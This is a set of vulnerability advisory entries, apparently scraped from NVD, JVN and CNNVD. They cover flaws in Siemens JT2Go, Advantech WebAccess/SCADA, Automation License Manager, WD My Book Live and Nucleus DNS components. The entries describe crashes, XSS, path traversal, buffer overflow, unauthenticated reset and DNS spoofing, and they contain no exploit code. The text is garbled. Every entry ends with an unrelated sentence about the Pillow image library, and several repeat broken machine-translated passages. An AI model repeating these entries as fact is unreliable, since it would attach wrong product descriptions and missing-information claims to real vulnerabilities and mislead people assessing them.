A vulnerability has been identified in JT2Go (All versions < V13.2.0.1), Teamcenter Visualization (All versions < V13.2.0.1). When parsing specially crafted CGM Files, a NULL pointer deference condition could cause the application to crash. The application must be restarted to restore the service. An attacker could leverage this vulnerability to cause a Denial-of-Service condition in the application. JT2Go and Teamcenter Visualization for, NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1). Advantech Provided by the company WebAccess/SCADA Is browser-based SCADA It is a software package. WebAccess/SCADA The following multiple vulnerabilities exist in. * Cross-site scripting (CWE-79) - CVE-2021-22676 ‥ * Relative path traversal (CWE-23) - CVE-2021-22674 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-32943The expected impact depends on each vulnerability, but it may be affected as follows. * Crafted by a remote third party JavaScript When the code is sent, cookie/ Session tokens can be hijacked, redirected to malicious websites, or unintentionally manipulated in a web browser - CVE-2021-22676 ‥ * A remote third party can access the product's files and directories without authentication. - CVE-2021-22674 ‥ * Arbitrary code executed by a remote third party - CVE-2021-32943. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA that stems from the product's failure to properly validate data boundaries. An attacker can use this vulnerability to cause stack overflow. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

The affected product is vulnerable to a relative path traversal condition, which may allow an attacker access to unauthorized files and directories on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1). Advantech Provided by the company WebAccess/SCADA Is browser-based SCADA It is a software package. WebAccess/SCADA The following multiple vulnerabilities exist in. * Cross-site scripting (CWE-79) - CVE-2021-22676 ‥ * Relative path traversal (CWE-23) - CVE-2021-22674 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-32943The expected impact depends on each vulnerability, but it may be affected as follows. * Crafted by a remote third party JavaScript When the code is sent, cookie/ Session tokens can be hijacked, redirected to malicious websites, or unintentionally manipulated in a web browser - CVE-2021-22676 ‥ * A remote third party can access the product's files and directories without authentication. - CVE-2021-22674 ‥ * Arbitrary code executed by a remote third party - CVE-2021-32943. A path traversal vulnerability exists in Advantech WebAccess/SCADA that stems from the product's failure to add access to input data. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability has been identified in Automation License Manager 5 (All versions), Automation License Manager 6 (All versions < V6.0 SP9 Update 2). Sending specially crafted packets to port 4410/tcp of an affected system could lead to extensive memory being consumed and as such could cause a denial-of-service preventing legitimate users from using the system. Automation License Manager Exists in a resource exhaustion vulnerability.Service operation interruption (DoS) It may be in a state. An attacker can exploit the vulnerability to cause a denial of service and prevent legitimate users from using the system. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

UserExcelOut.asp within WebAccess/SCADA is vulnerable to cross-site scripting (XSS), which could allow an attacker to send malicious JavaScript code. This could result in hijacking of cookie/session tokens, redirection to a malicious webpage, and unintended browser action on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1). Advantech Provided by the company WebAccess/SCADA Is browser-based SCADA It is a software package. WebAccess/SCADA The following multiple vulnerabilities exist in. * Cross-site scripting (CWE-79) - CVE-2021-22676 ‥ * Relative path traversal (CWE-23) - CVE-2021-22674 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-32943The expected impact depends on each vulnerability, but it may be affected as follows. * Crafted by a remote third party JavaScript When the code is sent, cookie/ Session tokens can be hijacked, redirected to malicious websites, or unintentionally manipulated in a web browser - CVE-2021-22676 ‥ * A remote third party can access the product's files and directories without authentication. - CVE-2021-22674 ‥ * Arbitrary code executed by a remote third party - CVE-2021-32943. A cross-site scripting vulnerability exists in Advantech WebAccess/SCADA, which stems from UserExcelOut.asp failing to properly verify the correctness of user data. An attacker could use this vulnerability to hijack the cookie session token and execute client-side code. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Western Digital WD My Book Live (2.x and later) and WD My Book Live Duo (all versions) have an administrator API that can perform a system factory restore without authentication, as exploited in the wild in June 2021, a different vulnerability than CVE-2018-18472. Western Digital WD My Book Live is a network storage device of Western Digital (Western Digital). The vulnerability stems from the product having an administrator API. Attackers can use this vulnerability to perform system factory recovery without authentication. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Incorrect permissions are set to default on the ‘Project Management’ page of WebAccess/SCADA portal of WebAccess/SCADA Versions 9.0.1 and prior, which may allow a low-privileged user to update an administrator’s password and login as an administrator to escalate privileges on the system. Advantech Provided by the company WebAccess/SCADA Is browser-based SCADA It is a software package. Advantech WebAccess/SCADA is a set of SCADA software based on browser architecture of Advantech. The software supports dynamic graphic display and real-time data control, and provides functions for remote control and management of automation equipment. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Advantech WebAccess/SCADA-IIoT is a web application developed by Advantech, Taiwan, China. There is a security vulnerability in WebAccess SCADA

A vulnerability has been identified in APOGEE PXC Compact (BACnet) (All versions < V3.5.5), APOGEE PXC Compact (P2 Ethernet) (All versions < V2.8.20), APOGEE PXC Modular (BACnet) (All versions < V3.5.5), APOGEE PXC Modular (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions < V2017.02.3), Nucleus ReadyStart V4 (All versions < V4.1.0), Nucleus Source Code (Versions including affected DNS modules), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), TALON TC Compact (BACnet) (All versions < V3.5.5), TALON TC Modular (BACnet) (All versions < V3.5.5). The DNS domain name label parsing functionality does not properly validate the null-terminated name in DNS-responses. The parsing of malformed responses could result in a read past the end of an allocated structure. An attacker with a privileged position in the network could leverage this vulnerability to cause a denial-of-service condition or leak the read memory. SIMOTICS CONNECT 400 is a connector and sensor box installed on a low-voltage motor and provides analysis data for the MindSphere application SIDRIVE IQ Fleet. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability has been identified in APOGEE PXC Compact (BACnet) (All versions < V3.5.5), APOGEE PXC Compact (P2 Ethernet) (All versions < V2.8.20), APOGEE PXC Modular (BACnet) (All versions < V3.5.5), APOGEE PXC Modular (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions < V2017.02.3), Nucleus ReadyStart V4 (All versions < V4.1.0), Nucleus Source Code (Versions including affected DNS modules), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), TALON TC Compact (BACnet) (All versions < V3.5.5), TALON TC Modular (BACnet) (All versions < V3.5.5). The DNS response parsing functionality does not properly validate various length and counts of the records. The parsing of malformed responses could result in a read past the end of an allocated structure. An attacker with a privileged position in the network could leverage this vulnerability to cause a denial-of-service condition or leak the memory past the allocated structure. SIMOTICS CONNECT 400 is a connector and sensor box installed on a low-voltage motor and provides analysis data for the MindSphere application SIDRIVE IQ Fleet. Siemens SIMOTICS CONNECT 400 has an out-of-bounds read vulnerability. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability has been identified in APOGEE PXC Compact (BACnet) (All versions < V3.5.5), APOGEE PXC Compact (P2 Ethernet) (All versions < V2.8.20), APOGEE PXC Modular (BACnet) (All versions < V3.5.5), APOGEE PXC Modular (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions < V2017.02.3), Nucleus ReadyStart V3 (All versions < V2017.02.4), Nucleus ReadyStart V4 (All versions < V4.1.0), Nucleus Source Code (Versions including affected DNS modules), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), SIMOTICS CONNECT 400 (All versions >= V0.5.0.0 < V1.0.0.0), TALON TC Compact (BACnet) (All versions < V3.5.5), TALON TC Modular (BACnet) (All versions < V3.5.5). The DNS client does not properly randomize DNS transaction IDs. That could allow an attacker to poison the DNS cache or spoof DNS resolving. SIMOTICS CONNECT 400 is a connector and sensor box installed on a low-voltage motor and provides analysis data for the MindSphere application SIDRIVE IQ Fleet. Siemens SIMOTICS CONNECT 400 has security vulnerabilities. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements